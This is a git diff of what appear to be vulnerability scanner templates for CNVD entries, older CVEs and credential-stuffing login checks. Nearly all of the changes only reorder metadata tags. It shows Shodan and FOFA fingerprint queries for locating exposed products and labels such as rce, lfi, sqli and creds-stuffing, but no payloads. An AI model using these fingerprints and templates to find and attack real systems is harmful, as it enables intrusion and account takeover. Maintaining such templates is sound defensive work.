cnvd,cnvd2021,ruoyi,lfi http: - method: GET diff --git a/http/cnvd/2021/CNVD-2021-09650.yaml b/http/cnvd/2021/CNVD-2021-09650.yaml index 5845b025f9..ac55e53af1 100644 --- a/http/cnvd/2021/CNVD-2021-09650.yaml +++ b/http/cnvd/2021/CNVD-2021-09650.yaml @@ -15,7 +15,7 @@ info: cwe-id: CWE-77 metadata: max-request: 1 - tags: ruijie,cnvd,cnvd2021,rce + tags: cnvd,cnvd2021,ruijie,rce http: - raw: diff --git a/http/cnvd/2021/CNVD-2021-10543.yaml b/http/cnvd/2021/CNVD-2021-10543.yaml index 55ae286f3c..cac7a97ec8 100644 --- a/http/cnvd/2021/CNVD-2021-10543.yaml +++ b/http/cnvd/2021/CNVD-2021-10543.yaml @@ -13,7 +13,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: config,exposure,cnvd,cnvd2021 + tags: cnvd,cnvd2021,config,exposure http: - method: GET diff --git a/http/cnvd/2021/CNVD-2021-14536.yaml b/http/cnvd/2021/CNVD-2021-14536.yaml index f362383dbe..924ad366bf 100644 --- a/http/cnvd/2021/CNVD-2021-14536.yaml +++ b/http/cnvd/2021/CNVD-2021-14536.yaml @@ -14,7 +14,7 @@ info: metadata: max-request: 1 fofa-query: title="RG-UAC登录页面" - tags: ruijie,cnvd,cnvd2021,disclosure + tags: cnvd2021,cnvd,ruijie,disclosure http: - method: GET diff --git a/http/cnvd/2021/CNVD-2021-15822.yaml b/http/cnvd/2021/CNVD-2021-15822.yaml index 2f2def8649..597ea9c11a 100644 --- a/http/cnvd/2021/CNVD-2021-15822.yaml +++ b/http/cnvd/2021/CNVD-2021-15822.yaml @@ -13,7 +13,7 @@ info: max-request: 1 shodan-query: title:"ShopXO企业级B2C电商系统提供商" fofa-query: app="ShopXO企业级B2C电商系统提供商" - tags: shopxo,lfi,cnvd,cnvd2021 + tags: cnvd2021,cnvd,shopxo,lfi http: - raw: diff --git a/http/cnvd/2021/CNVD-2021-15824.yaml b/http/cnvd/2021/CNVD-2021-15824.yaml index 07bffc67c6..0115ee56ff 100644 --- a/http/cnvd/2021/CNVD-2021-15824.yaml +++ b/http/cnvd/2021/CNVD-2021-15824.yaml @@ -15,7 +15,7 @@ info: cwe-id: CWE-79 metadata: max-request: 1 - tags: empirecms,cnvd,cnvd2021,xss,domxss + tags: cnvd2021,cnvd,empirecms,xss,domxss http: - method: GET diff --git a/http/cnvd/2021/CNVD-2021-17369.yaml b/http/cnvd/2021/CNVD-2021-17369.yaml index 5b6c1cc0ff..6e19586a20 100644 --- a/http/cnvd/2021/CNVD-2021-17369.yaml +++ b/http/cnvd/2021/CNVD-2021-17369.yaml @@ -13,7 +13,7 @@ info: cwe-id: CWE-522 metadata: max-request: 1 - tags: ruijie,disclosure,cnvd,cnvd2021 + tags: cnvd2021,cnvd,ruijie,disclosure http: - method: GET diff --git a/http/cnvd/2021/CNVD-2021-26422.yaml b/http/cnvd/2021/CNVD-2021-26422.yaml index 33197c44fe..4bc79fdbd8 100644 --- a/http/cnvd/2021/CNVD-2021-26422.yaml +++ b/http/cnvd/2021/CNVD-2021-26422.yaml @@ -14,7 +14,7 @@ info: cwe-id: CWE-77 metadata: max-request: 1 - tags: eyoumail,rce,cnvd,cnvd2021 + tags: cnvd2021,cnvd,eyoumail,rce http: - raw: diff --git a/http/cnvd/2021/CNVD-2021-28277.yaml b/http/cnvd/2021/CNVD-2021-28277.yaml index cbb2bb479f..52bf601806 100644 --- a/http/cnvd/2021/CNVD-2021-28277.yaml +++ b/http/cnvd/2021/CNVD-2021-28277.yaml @@ -15,7 +15,7 @@ info: metadata: max-request: 2 fofa-query: app="Landray OA system" - tags: landray,lfi,cnvd,cnvd2021 + tags: cnvd,cnvd2021,landray,lfi http: - raw: diff --git a/http/cnvd/2021/CNVD-2021-30167.yaml b/http/cnvd/2021/CNVD-2021-30167.yaml index 374565249b..fa21625dc4 100644 --- a/http/cnvd/2021/CNVD-2021-30167.yaml +++ b/http/cnvd/2021/CNVD-2021-30167.yaml @@ -15,7 +15,7 @@ info: cwe-id: CWE-77 metadata: max-request: 2 - tags: cnvd,cnvd2021,beanshell,rce,yonyou + tags: cnvd2021,cnvd,beanshell,rce,yonyou http: - raw: diff --git a/http/cnvd/2021/CNVD-2021-32799.yaml b/http/cnvd/2021/CNVD-2021-32799.yaml index 7511eb7eaf..8fa158edc9 100644 --- a/http/cnvd/2021/CNVD-2021-32799.yaml +++ b/http/cnvd/2021/CNVD-2021-32799.yaml @@ -14,7 +14,7 @@ info: verified: true max-request: 1 fofa-query: app="360新天擎" - tags: cnvd,cnvd2021,360,xintianqing,sqli + tags: cnvd2021,cnvd,360,xintianqing,sqli http: - method: GET diff --git a/http/cnvd/2021/CNVD-2021-33202.yaml b/http/cnvd/2021/CNVD-2021-33202.yaml index c46db387d1..503c3a173e 100755 --- a/http/cnvd/2021/CNVD-2021-33202.yaml +++ b/http/cnvd/2021/CNVD-2021-33202.yaml @@ -13,7 +13,7 @@ info: verified: true max-request: 1 fofa-query: app="泛微-协同办公OA" - tags: cnvd,cnvd2021,e-cology,sqli + tags: cnvd2021,cnvd,e-cology,sqli variables: num: "999999999" diff --git a/http/cnvd/2021/CNVD-2021-41972.yaml b/http/cnvd/2021/CNVD-2021-41972.yaml index 3d1dbae265..8d25493eb7 100644 --- a/http/cnvd/2021/CNVD-2021-41972.yaml +++ b/http/cnvd/2021/CNVD-2021-41972.yaml @@ -14,7 +14,7 @@ info: max-request: 1 shodan-query: http.favicon.hash:-1595726841 fofa-query: body="Login @ Reporter" - tags: cnvd,cnvd2021,acenet,acereporter,lfi + tags: cnvd2021,cnvd,acenet,acereporter,lfi variables: filename: "{{to_lower(rand_text_alpha(5))}}" diff --git a/http/cnvd/2021/CNVD-2021-43984.yaml b/http/cnvd/2021/CNVD-2021-43984.yaml index 0c25f5b57f..9024670d97 100644 --- a/http/cnvd/2021/CNVD-2021-43984.yaml +++ b/http/cnvd/2021/CNVD-2021-43984.yaml @@ -13,7 +13,7 @@ info: verified: true max-request: 1 fofa-query: "迈普通信技术股份有限公司" - tags: cnvd,cnvd2021,mpsec,maipu,lfi,isg + tags: cnvd2021,cnvd,mpsec,maipu,lfi,isg http: - method: GET diff --git a/http/cnvd/2021/CNVD-2021-49104.yaml b/http/cnvd/2021/CNVD-2021-49104.yaml index e34fe54666..ce7c6c0907 100644 --- a/http/cnvd/2021/CNVD-2021-49104.yaml +++ b/http/cnvd/2021/CNVD-2021-49104.yaml @@ -15,7 +15,7 @@ info: cwe-id: CWE-434 metadata: max-request: 2 - tags: pan,micro,cnvd,cnvd2021,fileupload,intrusive + tags: cnvd2021,cnvd,pan,micro,fileupload,intrusive http: - raw: diff --git a/http/cnvd/2022/CNVD-2022-03672.yaml b/http/cnvd/2022/CNVD-2022-03672.yaml index 3217c86934..8df60c0c94 100644 --- a/http/cnvd/2022/CNVD-2022-03672.yaml +++ b/http/cnvd/2022/CNVD-2022-03672.yaml @@ -16,7 +16,7 @@ info: cwe-id: CWE-77 metadata: max-request: 2 - tags: cnvd,cnvd2020,sunflower,rce + tags: cnvd,cnvd2022,sunflower,rce http: - raw: diff --git a/http/cnvd/2023/CNVD-2023-08743.yaml b/http/cnvd/2023/CNVD-2023-08743.yaml index 7213e46a4a..54dd2820f9 100644 --- a/http/cnvd/2023/CNVD-2023-08743.yaml +++ b/http/cnvd/2023/CNVD-2023-08743.yaml @@ -12,7 +12,7 @@ info: verified: true max-request: 1 fofa-query: title="人力资源信息管理系统" - tags: cnvd,cnvd2023,hongjing,hcm + tags: cnvd2023,cnvd,hongjing,hcm,sqli http: - raw: diff --git a/http/credential-stuffing/cloud/atechmedia-codebase-login-check.yaml b/http/credential-stuffing/cloud/atechmedia-codebase-login-check.yaml index dca8671210..9f22b6be01 100644 --- a/http/credential-stuffing/cloud/atechmedia-codebase-login-check.yaml +++ b/http/credential-stuffing/cloud/atechmedia-codebase-login-check.yaml @@ -9,7 +9,7 @@ info: - https://owasp.org/www-community/attacks/Credential_stuffing metadata: max-request: 2 - tags: login-check,atechmedia,codebase,creds-stuffing + tags: cloud,creds-stuffing,login-check,atechmedia,codebase self-contained: true diff --git a/http/credential-stuffing/cloud/atlassian-login-check.yaml b/http/credential-stuffing/cloud/atlassian-login-check.yaml index d29e8ffc78..8e0e37bb9e 100644 --- a/http/credential-stuffing/cloud/atlassian-login-check.yaml +++ b/http/credential-stuffing/cloud/atlassian-login-check.yaml @@ -9,7 +9,7 @@ info: - https://owasp.org/www-community/attacks/Credential_stuffing metadata: max-request: 1 - tags: login-check,atlassian,creds-stuffing + tags: cloud,creds-stuffing,login-check,atlassian self-contained: true diff --git a/http/credential-stuffing/cloud/avnil-pdf-generator-check.yaml b/http/credential-stuffing/cloud/avnil-pdf-generator-check.yaml index 5b7bd4c129..e29482d27d 100644 --- a/http/credential-stuffing/cloud/avnil-pdf-generator-check.yaml +++ b/http/credential-stuffing/cloud/avnil-pdf-generator-check.yaml @@ -9,7 +9,7 @@ info: - https://owasp.org/www-community/attacks/Credential_stuffing metadata: max-request: 1 - tags: login-check,avnil-pdf,creds-stuffing + tags: cloud,creds-stuffing,login-check,avnil-pdf self-contained: true diff --git a/http/credential-stuffing/cloud/chefio-login-check.yaml b/http/credential-stuffing/cloud/chefio-login-check.yaml index a931eaf337..ea8bb0b490 100644 --- a/http/credential-stuffing/cloud/chefio-login-check.yaml +++ b/http/credential-stuffing/cloud/chefio-login-check.yaml @@ -9,7 +9,7 @@ info: - https://owasp.org/www-community/attacks/Credential_stuffing metadata: max-request: 1 - tags: login-check,chefio,creds-stuffing + tags: cloud,creds-stuffing,login-check,chefio self-contained: true diff --git a/http/credential-stuffing/cloud/codepen-login-check.yaml b/http/credential-stuffing/cloud/codepen-login-check.yaml index 23ee8582c6..6668ad2ada 100644 --- a/http/credential-stuffing/cloud/codepen-login-check.yaml +++ b/http/credential-stuffing/cloud/codepen-login-check.yaml @@ -9,7 +9,7 @@ info: - https://owasp.org/www-community/attacks/Credential_stuffing metadata: max-request: 2 - tags: login-check,codepen,creds-stuffing + tags: creds-stuffing,login-check,cloud,codepen self-contained: true diff --git a/http/credential-stuffing/cloud/datadog-login-check.yaml b/http/credential-stuffing/cloud/datadog-login-check.yaml index bd934a04ed..a3ddc7cecd 100644 --- a/http/credential-stuffing/cloud/datadog-login-check.yaml +++ b/http/credential-stuffing/cloud/datadog-login-check.yaml @@ -9,7 +9,7 @@ info: - https://owasp.org/www-community/attacks/Credential_stuffing metadata: max-request: 2 - tags: login-check,datadog,creds-stuffing + tags: cloud,creds-stuffing,login-check,datadog self-contained: true diff --git a/http/credential-stuffing/cloud/docker-hub-login-check.yaml b/http/credential-stuffing/cloud/docker-hub-login-check.yaml index bdb56538ef..13e87da37f 100644 --- a/http/credential-stuffing/cloud/docker-hub-login-check.yaml +++ b/http/credential-stuffing/cloud/docker-hub-login-check.yaml @@ -9,7 +9,7 @@ info: - https://owasp.org/www-community/attacks/Credential_stuffing metadata: max-request: 1 - tags: login-check,docker,creds-stuffing + tags: creds-stuffing,login-check,cloud,docker self-contained: true diff --git a/http/credential-stuffing/cloud/gitea-login-check.yaml b/http/credential-stuffing/cloud/gitea-login-check.yaml index f35246fd37..ef8b876ffa 100644 --- a/http/credential-stuffing/cloud/gitea-login-check.yaml +++ b/http/credential-stuffing/cloud/gitea-login-check.yaml @@ -9,7 +9,7 @@ info: - https://owasp.org/www-community/attacks/Credential_stuffing metadata: max-request: 1 - tags: login-check,gitea,creds-stuffing + tags: cloud,creds-stuffing,login-check,gitea self-contained: true diff --git a/http/credential-stuffing/cloud/github-login-check.yaml b/http/credential-stuffing/cloud/github-login-check.yaml index fa252b2949..8a448371d8 100644 --- a/http/credential-stuffing/cloud/github-login-check.yaml +++ b/http/credential-stuffing/cloud/github-login-check.yaml @@ -9,7 +9,7 @@ info: - https://owasp.org/www-community/attacks/Credential_stuffing metadata: max-request: 2 - tags: login-check,github,creds-stuffing + tags: cloud,creds-stuffing,login-check,github self-contained: true diff --git a/http/credential-stuffing/cloud/postman-login-check.yaml b/http/credential-stuffing/cloud/postman-login-check.yaml index 2fcf8c57ab..3ec00e2fda 100644 --- a/http/credential-stuffing/cloud/postman-login-check.yaml +++ b/http/credential-stuffing/cloud/postman-login-check.yaml @@ -9,7 +9,7 @@ info: - https://owasp.org/www-community/attacks/Credential_stuffing metadata: max-request: 2 - tags: login-check,postman,creds-stuffing + tags: cloud,creds-stuffing,login-check,postman self-contained: true diff --git a/http/credential-stuffing/cloud/pulmi-login-check.yaml b/http/credential-stuffing/cloud/pulmi-login-check.yaml index 368a63678f..5ecbbcfc0f 100644 --- a/http/credential-stuffing/cloud/pulmi-login-check.yaml +++ b/http/credential-stuffing/cloud/pulmi-login-check.yaml @@ -9,7 +9,7 @@ info: - https://owasp.org/www-community/attacks/Credential_stuffing metadata: max-request: 1 - tags: login-check,pulmi,creds-stuffing + tags: cloud,creds-stuffing,login-check,pulmi self-contained: true diff --git a/http/credential-stuffing/self-hosted/gitlab-login-check-self-hosted.yaml b/http/credential-stuffing/self-hosted/gitlab-login-check-self-hosted.yaml index 6e12d090a2..edec06798d 100644 --- a/http/credential-stuffing/self-hosted/gitlab-login-check-self-hosted.yaml +++ b/http/credential-stuffing/self-hosted/gitlab-login-check-self-hosted.yaml @@ -11,7 +11,7 @@ info: max-request: 2 shodan-query: product:"GitLab Self-Managed" fofa-query: product="GitLab" - tags: login-check,gitlab,creds-stuffing,self-hosted + tags: creds-stuffing,login-check,self-hosted,gitlab variables: username: "{{username}}" password: "{{password}}" diff --git a/http/credential-stuffing/self-hosted/grafana-login-check.yaml b/http/credential-stuffing/self-hosted/grafana-login-check.yaml index af3016bbb2..84806dcbde 100644 --- a/http/credential-stuffing/self-hosted/grafana-login-check.yaml +++ b/http/credential-stuffing/self-hosted/grafana-login-check.yaml @@ -11,7 +11,7 @@ info: max-request: 1 shodan-query: title:"Grafana" fofa-query: title="Grafana" - tags: login-check,grafana,creds-stuffing,self-hosted + tags: self-hosted,creds-stuffing,login-check,grafana variables: username: "{{username}}" password: "{{password}}" diff --git a/http/credential-stuffing/self-hosted/jira-login-check.yaml b/http/credential-stuffing/self-hosted/jira-login-check.yaml index d3d14b37e6..6d0a4a3911 100644 --- a/http/credential-stuffing/self-hosted/jira-login-check.yaml +++ b/http/credential-stuffing/self-hosted/jira-login-check.yaml @@ -11,7 +11,7 @@ info: max-request: 1 shodan-query: http.component:"Atlassian Jira" fofa-query: product="JIRA" - tags: login-check,jira,creds-stuffing,self-hosted + tags: creds-stuffing,login-check,self-hosted,jira variables: username: "{{username}}" password: "{{password}}" diff --git a/http/cves/2002/CVE-2002-1131.yaml b/http/cves/2002/CVE-2002-1131.yaml index 4cc511bf5f..fbfd5c4f38 100644 --- a/http/cves/2002/CVE-2002-1131.yaml +++ b/http/cves/2002/CVE-2002-1131.yaml @@ -27,7 +27,7 @@ info: max-request: 5 vendor: squirrelmail product: squirrelmail - tags: cve2002,edb,xss,squirrelmail,cve + tags: cve,cve2002,edb,xss,squirrelmail http: - method: GET diff --git a/http/cves/2004/CVE-2004-0519.yaml b/http/cves/2004/CVE-2004-0519.yaml index dd72a4ab41..4f89596f87 100644 --- a/http/cves/2004/CVE-2004-0519.yaml +++ b/http/cves/2004/CVE-2004-0519.yaml @@ -26,7 +26,7 @@ info: max-request: 1 vendor: sgi product: propack - tags: squirrelmail,cve2004,cve,edb,xss,sgi + tags: cve,cve2004,squirrelmail,edb,xss,sgi http: - method: GET diff --git a/http/cves/2005/CVE-2005-2428.yaml b/http/cves/2005/CVE-2005-2428.yaml index 5f20ec31d2..f96035614d 100644 --- a/http/cves/2005/CVE-2005-2428.yaml +++ b/http/cves/2005/CVE-2005-2428.yaml @@ -26,7 +26,7 @@ info: max-request: 1 vendor: ibm product: lotus_domino - tags: domino,edb,cve,cve2005,ibm + tags: cve2005,cve,domino,edb,ibm http: - method: GET diff --git a/http/cves/2005/CVE-2005-3344.yaml b/http/cves/2005/CVE-2005-3344.yaml index 20a0675c96..8484e7e2fc 100644 --- a/http/cves/2005/CVE-2005-3344.yaml +++ b/http/cves/2005/CVE-2005-3344.yaml @@ -27,7 +27,7 @@ info: max-request: 2 vendor: horde product: horde - tags: cve,cve2005,horde,unauth + tags: cve2005,cve,horde,unauth http: - method: GET diff --git a/http/cves/2005/CVE-2005-3634.yaml b/http/cves/2005/CVE-2005-3634.yaml index a7f24f1089..7dcf6fb25b 100644 --- a/http/cves/2005/CVE-2005-3634.yaml +++ b/http/cves/2005/CVE-2005-3634.yaml @@ -30,7 +30,7 @@ info: vendor: sap product: sap_web_application_server shodan-query: html:"SAP Business Server Pages Team" - tags: cve,cve2005,sap,redirect,business + tags: cve,cve2005,sap,redirect,business,xss http: - method: GET diff --git a/http/cves/2005/CVE-2005-4385.yaml b/http/cves/2005/CVE-2005-4385.yaml index 3ca9ec067a..f02984701a 100644 --- a/http/cves/2005/CVE-2005-4385.yaml +++ b/http/cves/2005/CVE-2005-4385.yaml @@ -25,7 +25,7 @@ info: max-request: 1 vendor: cofax product: cofax - tags: cofax,xss,cve,cve2005 + tags: cve2005,cve,cofax,xss http: - method: GET diff --git a/http/cves/2006/CVE-2006-1681.yaml b/http/cves/2006/CVE-2006-1681.yaml index 4e07c04fa4..a8d89d68dd 100644 --- a/http/cves/2006/CVE-2006-1681.yaml +++ b/http/cves/2006/CVE-2006-1681.yaml @@ -26,7 +26,7 @@ info: max-request: 1 vendor: cherokee product: cherokee_httpd - tags: cherokee,httpd,xss,cve,cve2006 + tags: cve,cve2006,cherokee,httpd,xss http: - method: GET diff --git a/http/cves/2007/CVE-2007-4504.yaml b/http/cves/2007/CVE-2007-4504.yaml index 0b75097769..e8995a3473 100644 --- a/http/cves/2007/CVE-2007-4504.yaml +++ b/http/cves/2007/CVE-2007-4504.yaml @@ -25,7 +25,7 @@ info: max-request: 1 vendor: joomla product: rsfiles - tags: lfi,edb,cve,cve2007,joomla + tags: cve2007,cve,lfi,edb,joomla http: - method: GET diff --git a/http/cves/2007/CVE-2007-5728.yaml b/http/cves/2007/CVE-2007-5728.yaml index aa28240ef1..cf4cd32efe 100644 --- a/http/cves/2007/CVE-2007-5728.yaml +++ b/http/cves/2007/CVE-2007-5728.yaml @@ -28,7 +28,7 @@ info: vendor: phppgadmin product: phppgadmin shodan-query: http.title:"phpPgAdmin" - tags: cve,cve2007,xss,pgadmin,phppgadmin,edb + tags: cve2007,cve,xss,pgadmin,phppgadmin,edb http: - method: GET diff --git a/http/cves/2008/CVE-2008-1059.yaml b/http/cves/2008/CVE-2008-1059.yaml index 86cffe969a..976ffed98c 100644 --- a/http/cves/2008/CVE-2008-1059.yaml +++ b/http/cves/2008/CVE-2008-1059.yaml @@ -28,7 +28,7 @@ info: max-request: 1 vendor: wordpress product: sniplets_plugin - tags: lfi,cve,cve2008,wordpress,wp-plugin,wp,sniplets,edb,wpscan + tags: cve2008,cve,lfi,wordpress,wp-plugin,wp,sniplets,edb,wpscan http: - method: GET diff --git a/http/cves/2008/CVE-2008-1061.yaml b/http/cves/2008/CVE-2008-1061.yaml index 0b16c19cce..21bbe168b3 100644 --- a/http/cves/2008/CVE-2008-1061.yaml +++ b/http/cves/2008/CVE-2008-1061.yaml @@ -28,7 +28,7 @@ info: max-request: 1 vendor: wordpress product: sniplets_plugin - tags: xss,wp-plugin,wp,edb,wpscan,cve,cve2008,wordpress,sniplets + tags: cve2008,cve,xss,wp-plugin,wp,edb,wpscan,wordpress,sniplets http: - method: GET diff --git a/http/cves/2008/CVE-2008-1547.yaml b/http/cves/2008/CVE-2008-1547.yaml index 182e4ff960..4d3c34185d 100644 --- a/http/cves/2008/CVE-2008-1547.yaml +++ b/http/cves/2008/CVE-2008-1547.yaml @@ -28,7 +28,7 @@ info: vendor: microsoft product: exchange_server shodan-query: http.title:"Outlook" - tags: cve,cve2008,redirect,owa,exchange,microsoft + tags: cve2008,cve,redirect,owa,exchange,microsoft http: - method: GET diff --git a/http/cves/2008/CVE-2008-2398.yaml b/http/cves/2008/CVE-2008-2398.yaml index eb2dd50f03..bf4146a6cb 100644 --- a/http/cves/2008/CVE-2008-2398.yaml +++ b/http/cves/2008/CVE-2008-2398.yaml @@ -25,7 +25,7 @@ info: max-request: 1 vendor: appserv_open_project product: appserv - tags: cve,cve2008,xss,appserv_open_project + tags: cve2008,cve,xss,appserv_open_project http: - method: GET diff --git a/http/cves/2008/CVE-2008-4668.yaml b/http/cves/2008/CVE-2008-4668.yaml index 60ae910df7..c9a8dced50 100644 --- a/http/cves/2008/CVE-2008-4668.yaml +++ b/http/cves/2008/CVE-2008-4668.yaml @@ -26,7 +26,7 @@ info: max-request: 1 vendor: joomla product: com_imagebrowser - tags: cve,cve2008,joomla,lfi,edb + tags: cve2008,cve,joomla,lfi,edb http: - method: GET diff --git a/http/cves/2008/CVE-2008-4764.yaml b/http/cves/2008/CVE-2008-4764.yaml index bd1125ede7..7923946a87 100644 --- a/http/cves/2008/CVE-2008-4764.yaml +++ b/http/cves/2008/CVE-2008-4764.yaml @@ -23,7 +23,7 @@ info: max-request: 1 vendor: extplorer product: com_extplorer - tags: edb,cve,cve2008,joomla,lfi,extplorer + tags: cve,cve2008,edb,joomla,lfi,extplorer http: - method: GET diff --git a/http/cves/2008/CVE-2008-6080.yaml b/http/cves/2008/CVE-2008-6080.yaml index 2a1765763f..e9d42f36a5 100644 --- a/http/cves/2008/CVE-2008-6080.yaml +++ b/http/cves/2008/CVE-2008-6080.yaml @@ -25,7 +25,7 @@ info: max-request: 1 vendor: codecall product: com_ionfiles - tags: edb,cve,cve2008,joomla,lfi,codecall + tags: cve,cve2008,edb,joomla,lfi,codecall http: - method: GET diff --git a/http/cves/2008/CVE-2008-6172.yaml b/http/cves/2008/CVE-2008-6172.yaml index bbac849887..44a3009bcc 100644 --- a/http/cves/2008/CVE-2008-6172.yaml +++ b/http/cves/2008/CVE-2008-6172.yaml @@ -25,7 +25,7 @@ info: max-request: 1 vendor: weberr product: rwcards - tags: cve2008,joomla,lfi,edb,cve,weberr + tags: cve2008,cve,joomla,lfi,edb,weberr http: - method: GET diff --git a/http/cves/2008/CVE-2008-6222.yaml b/http/cves/2008/CVE-2008-6222.yaml index 529ec4dfe5..aff72d5784 100644 --- a/http/cves/2008/CVE-2008-6222.yaml +++ b/http/cves/2008/CVE-2008-6222.yaml @@ -25,7 +25,7 @@ info: max-request: 1 vendor: joomlashowroom product: pro_desk_support_center - tags: cve2008,joomla,lfi,edb,cve,joomlashowroom + tags: cve,cve2008,joomla,lfi,edb,joomlashowroom http: - method: GET diff --git a/http/cves/2008/CVE-2008-6668.yaml b/http/cves/2008/CVE-2008-6668.yaml index 51f1f21cbc..b6c021c629 100644 --- a/http/cves/2008/CVE-2008-6668.yaml +++ b/http/cves/2008/CVE-2008-6668.yaml @@ -26,7 +26,7 @@ info: max-request: 2 vendor: dirk_bartley product: nweb2fax - tags: cve2008,nweb2fax,lfi,traversal,edb,cve,dirk_bartley + tags: cve,cve2008,nweb2fax,lfi,traversal,edb,dirk_bartley http: - method: GET diff --git a/http/cves/2009/CVE-2009-0545.yaml b/http/cves/2009/CVE-2009-0545.yaml index 007940e9e3..1bb3569bf8 100644 --- a/http/cves/2009/CVE-2009-0545.yaml +++ b/http/cves/2009/CVE-2009-0545.yaml @@ -27,7 +27,7 @@ info: max-request: 1 vendor: zeroshell product: zeroshell - tags: edb,cve,cve2009,zeroshell,kerbynet,rce + tags: cve,cve2009,edb,zeroshell,kerbynet,rce http: - method: GET diff --git a/http/cves/2009/CVE-2009-1151.yaml b/http/cves/2009/CVE-2009-1151.yaml index 646906dc75..c08cd09c05 100644 --- a/http/cves/2009/CVE-2009-1151.yaml +++ b/http/cves/2009/CVE-2009-1151.yaml @@ -27,7 +27,7 @@ info: max-request: 1 vendor: phpmyadmin product: phpmyadmin - tags: deserialization,kev,vulhub,cve,cve2009,phpmyadmin,rce + tags: cve,cve2009,deserialization,kev,vulhub,phpmyadmin,rce http: - raw: diff --git a/http/cves/2009/CVE-2009-1496.yaml b/http/cves/2009/CVE-2009-1496.yaml index 6f335992fb..dacb8d5462 100644 --- a/http/cves/2009/CVE-2009-1496.yaml +++ b/http/cves/2009/CVE-2009-1496.yaml @@ -25,7 +25,7 @@ info: max-request: 1 vendor: joomla product: joomla - tags: joomla,lfi,edb,cve,cve2009 + tags: cve2009,cve,joomla,lfi,edb http: - method: GET diff --git a/http/cves/2009/CVE-2009-1558.yaml b/http/cves/2009/CVE-2009-1558.yaml index 66e6bfa43e..fc80f46f2f 100644 --- a/http/cves/2009/CVE-2009-1558.yaml +++ b/http/cves/2009/CVE-2009-1558.yaml @@ -27,7 +27,7 @@ info: max-request: 1 vendor: cisco product: wvc54gca - tags: cve,iot,linksys,camera,traversal,cve2009,lfi,cisco,firmware,edb + tags: cve2009,cve,iot,linksys,camera,traversal,lfi,cisco,firmware,edb http: - method: GET diff --git a/http/cves/2009/CVE-2009-1872.yaml b/http/cves/2009/CVE-2009-1872.yaml index ce82b92d4a..db328550fe 100644 --- a/http/cves/2009/CVE-2009-1872.yaml +++ b/http/cves/2009/CVE-2009-1872.yaml @@ -28,7 +28,7 @@ info: vendor: adobe product: coldfusion shodan-query: http.component:"Adobe ColdFusion" - tags: cve,cve2009,adobe,xss,coldfusion,tenable + tags: cve2009,cve,adobe,xss,coldfusion,tenable http: - method: GET diff --git a/http/cves/2009/CVE-2009-2015.yaml b/http/cves/2009/CVE-2009-2015.yaml index 4ca2de61da..85de45277e 100644 --- a/http/cves/2009/CVE-2009-2015.yaml +++ b/http/cves/2009/CVE-2009-2015.yaml @@ -25,7 +25,7 @@ info: max-request: 1 vendor: joomla product: joomla - tags: joomla,lfi,edb,cve,cve2009 + tags: cve,cve2009,joomla,lfi,edb http: - method: GET diff --git a/http/cves/2009/CVE-2009-2100.yaml b/http/cves/2009/CVE-2009-2100.yaml index 57cfc09f72..9d908c42f6 100644 --- a/http/cves/2009/CVE-2009-2100.yaml +++ b/http/cves/2009/CVE-2009-2100.yaml @@ -24,7 +24,7 @@ info: max-request: 1 vendor: joomla product: joomla - tags: cve,cve2009,joomla,lfi,edb + tags: cve2009,cve,joomla,lfi,edb http: - method: GET diff --git a/http/cves/2009/CVE-2009-3053.yaml b/http/cves/2009/CVE-2009-3053.yaml index af5743455d..620634b5d2 100644 --- a/http/cves/2009/CVE-2009-3053.yaml +++ b/http/cves/2009/CVE-2009-3053.yaml @@ -26,7 +26,7 @@ info: max-request: 1 vendor: joomla product: joomla - tags: cve,cve2009,joomla,lfi,edb + tags: cve2009,cve,joomla,lfi,edb http: - method: GET diff --git a/http/cves/2009/CVE-2009-3318.yaml b/http/cves/2009/CVE-2009-3318.yaml index 0500d83687..371369eac8 100644 --- a/http/cves/2009/CVE-2009-3318.yaml +++ b/http/cves/2009/CVE-2009-3318.yaml @@ -25,7 +25,7 @@ info: max-request: 1 vendor: joomla product: joomla - tags: joomla,lfi,edb,cve,cve2009 + tags: cve2009,cve,joomla,lfi,edb http: - method: GET diff --git a/http/cves/2009/CVE-2009-4202.yaml b/http/cves/2009/CVE-2009-4202.yaml index a3da99748f..2b991b2b87 100644 --- a/http/cves/2009/CVE-2009-4202.yaml +++ b/http/cves/2009/CVE-2009-4202.yaml @@ -26,7 +26,7 @@ info: max-request: 1 vendor: joomla product: joomla\! - tags: cve2009,joomla,lfi,photo,edb,cve + tags: cve,cve2009,joomla,lfi,photo,edb http: - method: GET diff --git a/http/cves/2009/CVE-2009-4679.yaml b/http/cves/2009/CVE-2009-4679.yaml index be572176b2..0f09d1aa2c 100644 --- a/http/cves/2009/CVE-2009-4679.yaml +++ b/http/cves/2009/CVE-2009-4679.yaml @@ -26,7 +26,7 @@ info: max-request: 1 vendor: inertialfate product: com_if_nexus - tags: cve,cve2009,joomla,lfi,nexus,edb,inertialfate + tags: cve2009,cve,joomla,lfi,nexus,edb,inertialfate http: - method: GET diff --git a/http/cves/2009/CVE-2009-5020.yaml b/http/cves/2009/CVE-2009-5020.yaml index 08a8e291fd..914859a2bc 100644 --- a/http/cves/2009/CVE-2009-5020.yaml +++ b/http/cves/2009/CVE-2009-5020.yaml @@ -23,7 +23,7 @@ info: max-request: 2 vendor: awstats product: awstats - tags: cve,cve2009,redirect,awstats + tags: cve2009,cve,redirect,awstats http: - method: GET diff --git a/http/cves/2009/CVE-2009-5114.yaml b/http/cves/2009/CVE-2009-5114.yaml index 4fcbcb99ec..828cbe50c7 100644 --- a/http/cves/2009/CVE-2009-5114.yaml +++ b/http/cves/2009/CVE-2009-5114.yaml @@ -25,7 +25,7 @@ info: max-request: 1 vendor: iwork product: webglimpse - tags: edb,cve,cve2009,lfi,iwork + tags: cve,cve2009,edb,lfi,iwork http: - method: GET diff --git a/http/cves/2010/CVE-2010-0157.yaml b/http/cves/2010/CVE-2010-0157.yaml index 47a5d2a53f..f4e3588f3d 100644 --- a/http/cves/2010/CVE-2010-0157.yaml +++ b/http/cves/2010/CVE-2010-0157.yaml @@ -24,7 +24,7 @@ info: max-request: 1 vendor: joomla product: joomla\! - tags: cve,cve2010,joomla,lfi,edb,packetstorm + tags: cve2010,cve,joomla,lfi,edb,packetstorm http: - method: GET diff --git a/http/cves/2010/CVE-2010-0467.yaml b/http/cves/2010/CVE-2010-0467.yaml index 3c83303be4..fa885aa70a 100644 --- a/http/cves/2010/CVE-2010-0467.yaml +++ b/http/cves/2010/CVE-2010-0467.yaml @@ -26,7 +26,7 @@ info: max-request: 1 vendor: chillcreations product: com_ccnewsletter - tags: cve,cve2010,joomla,lfi,edb,chillcreations + tags: cve2010,cve,joomla,lfi,edb,chillcreations http: - method: GET 